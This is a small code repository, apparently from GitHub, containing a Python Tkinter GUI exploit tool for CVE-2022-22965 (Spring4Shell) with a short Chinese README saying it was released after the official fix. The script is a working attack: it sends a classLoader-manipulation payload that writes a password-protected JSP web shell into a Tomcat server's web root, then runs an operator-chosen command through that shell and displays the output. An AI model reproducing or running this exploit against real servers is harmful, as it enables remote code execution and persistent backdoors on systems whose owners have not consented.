├── img
    ├── QQ20220331-100333@2x.png
    └── QQ20220331-114052@2x.png
├── README.md
└── spring-core-rce.py


/img/QQ20220331-100333@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bouquets-ai/CVE-2022-22965-GUItools/HEAD/img/QQ20220331-100333@2x.png


--------------------------------------------------------------------------------
/img/QQ20220331-114052@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bouquets-ai/CVE-2022-22965-GUItools/HEAD/img/QQ20220331-114052@2x.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-22965及官方修复方案已出。我是修复方案出来了才放的工具哈，各位别乱搞
2 | 
3 | 
4 | ![](https://hellohy.top/wp-content/uploads/2022/03/QQ20220331-100333@2x-1024x777.png)
5 | ![](https://hellohy.top/wp-content/uploads/2022/03/QQ20220331-114052@2x-1024x522.png)
6 | ![](https://hellohy.top/imgs/logo.png)
7 | 
8 | # 工具不会再做任何更改，等过几天把源码上传后就改为归档，想要批量你们自己搞，这个洞没必要。
9 | 


--------------------------------------------------------------------------------
/spring-core-rce.py:
--------------------------------------------------------------------------------
 1 | # !/usr/bin/python
 2 | # -*- coding:utf-8 -*-
 3 | # name: huayang
 4 | # time: 2022.3.31
 5 | 
 6 | import requests
 7 | import tkinter
 8 | import time
 9 | from tkinter import *
10 | from tkinter import ttk
11 | from tkinter import scrolledtext
12 | 
13 | window = Tk()
14 | 
15 | ttk.Style().configure(".", font=("仿宋", 15))
16 | 
17 | window.title('spring-core-rce@huayang(数据里有话)')
18 | 
19 | window.geometry("714x698")
20 | 
21 | window.wm_resizable(False,False)
22 | 
23 | 
24 | tabControl = ttk.Notebook(window)  
25 | 
26 | tabControl.pack(expand=1, fill="both")  
27 | 
28 | #------------------------------
29 | w = tkinter.Label(text="地址:",font=("楷体", 15))
30 | w.place(x=5, y=20)
31 | scr1 = scrolledtext.ScrolledText(width=70, height=3, font=(1))
32 | scr1.place(x=70, y=10)  
33 | w = tkinter.Label(text="命令:",font=("楷体", 15))
34 | w.place(x=5, y=115)
35 | scr2 = scrolledtext.ScrolledText(width=48, height=3, font=(1))
36 | scr2.place(x=70, y=100)  
37 | button = Button(text="利用", width=9, height=3)  
38 | button.place(x=495, y=100)  
39 | 
40 | w = tkinter.Label(text="执行结果:",font=("楷体", 20))
41 | w.place(x=280, y=175)
42 | scr3 = scrolledtext.ScrolledText(width=85, height=29, font=(1))
43 | scr3.place(x=5, y=220) 
44 | scr3.insert(END, '第一次利用因逻辑问题要等个几秒点击第二下才有结果哦o(*≧▽≦)ツ')
45 | 
46 | def empty():  
47 |     scr1.delete('0.0', 'end')
48 |     scr2.delete('0.0', 'end')
49 |     scr3.delete('0.0', 'end')
50 | 
51 | button = Button(text="一键清空", width=9, height=3, command=empty)
52 | button.place(x=590, y=100)
53 | 
54 | def utilize():
55 | 
56 |     txt = scr1.get('0.0', 'end')
57 |     strip1 = txt.strip('\n')
58 |     txt = scr2.get('0.0', 'end')
59 |     strip2 = txt.strip('\n')
60 | 
61 |     def Exploit(url):
62 |         headers = {"suffix": "%>//",
63 |                    "c1": "Runtime",
64 |                    "c2": "<%",
65 |                    "DNT": "1",
66 |                    "Content-Type": "application/x-www-form-urlencoded",
67 |                    "say": "5qC45b+D5Luj56CB5Y6f5L2c6ICF5pivaGVsbG9leHAo5Zug5LiN5Y+v5o6n5Zug57Sg5LuW5bey57uPZ2l0aHVi5LiK5raI5aSx5LqGKe+8jOacrOS6uuWPquaYr+eugOaUueS4gOS4i+W5tuWll+Wxguearizku4XmraTor4HmmI7ku5blrZjlnKjov4c="
68 |                    }
69 |         data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=temper&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
70 | 
71 |         requests.post(url, headers=headers, data=data, timeout=15, allow_redirects=False, verify=False)
72 |     Exploit(strip1)
73 |     response = requests.get(strip1 + '/temper.jsp?pwd=j&cmd=' + strip2)
74 |     str = response.text
75 |     string = str.split('//')[0]
76 | 
77 |     scr3.insert(END, string)
78 | 
79 |     scr3.insert(END, '\n')  
80 | 
81 | 
82 | button = Button(text="利用", width=9, height=3,command=utilize)  
83 | button.place(x=495, y=100)  
84 | 
85 | window.mainloop()


--------------------------------------------------------------------------------